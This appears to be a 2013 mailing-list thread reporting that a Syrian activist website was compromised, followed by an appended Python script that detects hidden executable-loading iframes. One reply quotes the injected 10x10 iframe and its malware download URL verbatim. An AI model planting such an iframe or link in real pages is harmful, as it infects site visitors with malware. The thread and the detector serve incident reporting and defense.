[liberationtech] Syrian-martyrs.com website probably compromised by virus

SiNA Rabbani sina at redteam.io
Tue Jan 29 14:32:24 PST 2013


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

holy shit:

<iframe name="I1" width="10" height="10"
src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
border="0"
frameborder="0">


:/ if you are running windows don't even go there!!!


Andrew Lewis:
> I can get to this in 6 hours or so, maybe someone is willing to
> jump on this before then?
> 
> -Andrew
> 
> On Jan 30, 2013, at 11:06 AM, KheOps <kheops at ceops.eu> wrote:
> 
>> Dear Libtech,
>> 
>> We just saw that the website: http://www.syrian-martyrs.com is
>> probably compromised. Every page of the website contains an
>> iFrame which links to a .exe file which is detected as a virus by
>> antivirus software: 
>> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
>>
>> The fact that the HTML code is present at the bottom of each page makes
>> me think that the "index.php" page has been changed in a way that
>> makes that iFrame appear on every page of the website, after the
>> dynamic content.
>> 
>> It also probably means that the attackers have some kind of
>> access to the server. My guess would be going to a PHP shell, but
>> I'm no expert in this.
>> 
>> Any help, clue, investigation, would be very welcome :)
>> 
>> Thank you, KheOps
>> 
>> -- Unsubscribe, change to digest, or change password at:
>> https://mailman.stanford.edu/mailman/listinfo/liberationtech
> 


- -- 
“Be the change you want to see in the world.” Gandhi

OTR: inf0 at jabber.ccc.de
a5dae15f45a37e9768f6deae7b54807fc4942ec9
-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----
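
Added example (not part of the original messages, and not code from the list or the site's maintainers): a Python check a site maintainer could run over saved page HTML to flag iframes shaped like the one quoted in this thread. The host names, extension list, 10-pixel threshold and sample page are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

EXEC_EXTS = (".exe", ".scr", ".pif", ".msi")  # assumption: extensions worth flagging

def _px(value):
    """Return a width/height attribute as an int, or None if absent or not numeric."""
    try:
        return int((value or "").strip().rstrip("px"))
    except ValueError:
        return None

class IframeAudit(HTMLParser):
    def __init__(self, site_host, max_px=10):
        super().__init__()
        self.site_host, self.max_px = site_host.lower(), max_px
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        url = urlparse(a.get("src", "").strip())
        reasons = []
        if url.hostname and url.hostname != self.site_host:
            reasons.append("off-site src")
        if url.path.lower().endswith(EXEC_EXTS):
            reasons.append("src is an executable")
        dims = [_px(a.get("width")), _px(a.get("height"))]
        if any(d is not None and d <= self.max_px for d in dims):
            reasons.append("near-invisible size")
        # One weak signal alone (e.g. an ordinary video embed) is not reported.
        if "src is an executable" in reasons or len(reasons) >= 2:
            self.findings.append((self.getpos()[0], a.get("src", ""), reasons))

def audit_page(html, site_host):
    """Return [(line, src, reasons)] for suspicious iframes in one page."""
    parser = IframeAudit(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample: a normal embed plus a footer iframe shaped like the quoted one.
SAMPLE = """<html><body>
<h1>Constructed page</h1>
<iframe width="560" height="315" src="https://video.example.org/embed/1"></iframe>
</body></html>
<iframe name="I1" width="10" height="10"
src="http://files.example.net/uploads/ActiveX.exe" border="0" frameborder="0">
"""

if __name__ == "__main__":
    for line, src, reasons in audit_page(SAMPLE, "www.example.org"):
        print(f"line {line}: {src} ({', '.join(reasons)})")
```

Running it over every rendered page and comparing the reported line against the template source helps confirm whether a shared file such as index.php is the one that was modified.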


